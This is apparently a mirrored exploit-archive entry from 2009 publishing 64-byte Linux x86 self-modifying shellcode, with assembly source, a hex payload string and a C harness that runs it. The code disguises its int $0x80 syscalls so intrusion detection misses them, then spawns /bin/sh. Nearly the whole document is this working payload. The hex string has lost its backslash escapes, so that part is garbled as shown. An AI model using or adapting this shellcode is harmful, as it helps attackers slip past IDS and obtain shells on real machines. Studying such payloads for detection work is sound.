[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : linux/x86 Self-modifying shellcode for IDS evasion 64 bytes
# Published : 2009-09-15
# Author : XenoMuta
# Previous Title : Linux - linux/x86 execve() - 51bytes
# Next Title : 14 Bytes execve("a->/bin/sh") Local-only Shellcode


/*
    _  __                 __  ___      __
   | |/ /__  ____  ____  /  |/  /_  __/ /_____ _
   |   / _ / __ / __ / /|_/ / / / / __/ __ `/
  /   /  __/ / / / /_/ / /  / / /_/ / /_/ /_/ /
 /_/|____/_/ /_/____/_/  /_/__,_/__/__,_/

 xenomutax40phreakerx2enet
 http://xenomuta.tuxfamily.org/ - Methylxantina 256mg

 Description:
 linux/x86 Self-modifying ShellCode for IDS evasion
 creates int $0x80 syscalls on runtime.

 OS: Linux
 Arch: x86
 Length: 64 bytes ( 35 without /bin/sh payload )
 Author: XenoMuta

 hola at:
  str0k3, garay, fr1t0l4y, emra.
  - God bless you all -

=== SOURCE CODE ====
.globl _start
_start:
	jmp _findOut	
_WhereAmI:
	pop %edx	// Save our payload's address g20
	mov %edx, %esi	// and save it 4 later 
_loopMakeInt80s:
	mov (%edx), %eax
	cmpw $0x7dca, %ax	// Find this guy ( 0x7dca ) and 
	jne _no
	addw $0x303, %ax	// 0x7dca + 0x303 == 0x80cd ( int $0x80 )
	mov %eax, (%edx)
_no:
	incb %dl
	cmp $0x41414141, %eax	// Use 'AAAA' as end Marker.
	jne _loopMakeInt80s	
	jmp *%esi		// Jump to our converted code when done
_findOut:
	call _WhereAmI
_payload:			// Paste your shell code here and then replace 
	xor %edx, %edx		// "xcdx80" (int $0x80) for .ascii "xca7d" 
	push $0xb		// and end with .ascii "AAAA" as end marker 
	pop %eax
	cltd
	push %edx
	push $0x68732f2f
	push $0x6e69622f
	mov %esp, %ebx
	push %edx
	push %ebx
	mov %esp,%ecx
	.ascii "xcax7d" // + 0x303 = 0xcd80 (int $0x80)
	.ascii "AAAA"
=== SOURCE CODE ====
*/


char shellcode[] = "xebx1cx5ax89xd6x8bx02x66x3dxcax7dx75x06x66x05x03x03x89x02xfexc2x3dx41x41x41x41x75xe9xffxe6xe8xdfxffxffxffx31xd2x6ax0bx58x99x52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53x89xe1xcax7dx41x41x41x41";

int main ()
{
	printf("Length: %d bytesn", strlen(shellcode));
	int (*sc)() = (int (*)())shellcode;
	sc();
	return 0;
}

// www.Syue.com [2009-09-15]